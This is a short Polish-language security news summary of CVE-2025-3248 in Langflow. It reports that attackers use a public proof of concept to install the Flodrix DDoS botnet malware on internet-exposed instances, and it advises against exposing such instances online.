Langflow jako narzędzie do tworzenia agentów AI i serwerów MCP jest szeroko wykorzystywane w środowiskach prywatnych i korporacyjnych do skalowalnych projektów oraz automatyzacji wspomaganej sztuczną inteligencją. Instancje Langflow są często dostępne z internetu, co skutkuje masowym wykorzystywaniem podatności ze względu na ogólnodostępny PoC, z którego skorzystali także atakujący w kampanii opisywanej przez TrendMicro. Analitycy wskazują na potencjalne wykorzystanie przez atakujących narzędzi do skanowania internetu, jak na przykład FOFA lub Shodan.

Podatność służy atakującym do wykonania na serwerze skryptów pobierających i instalujących złośliwe oprogramowanie Flodrix. Przejęte urządzenia mogą być zdalnie sterowane z serwera C2 i wykorzystywane do przeprowadzania ataków DDoS. Utrata kontroli nad serwerem Langflow wiąże się także z nieautoryzowanym dostępem do danych na nim i potencjalnym wykorzystaniem ich przez atakujących. CVE-2025-3248 powinno przypominać, iż w środowiskach służących do eksperymentów i hobbystycznych projektów także pojawiają się krytyczne podatności, które mogą okazać się dotkliwe dla całej domowej lub firmowej sieci. Przed zrealizowaniem spontanicznego pomysłu, warto dowiedzieć się, czy nie ma znanych podatności w wybieranym oprogramowaniu i wziąć pod uwagę ograniczanie powierzchni ataku – w tym przypadku warto rozważyć powstrzymanie się od udostępniania instancji Langflow w internecie.

W artykule znajdziemy także głębszą analizę samego złośliwego systemu Flodrix wraz z przejściem przez wszystkie etapy infekcji i porównaniem go do botnetu LeetHozer.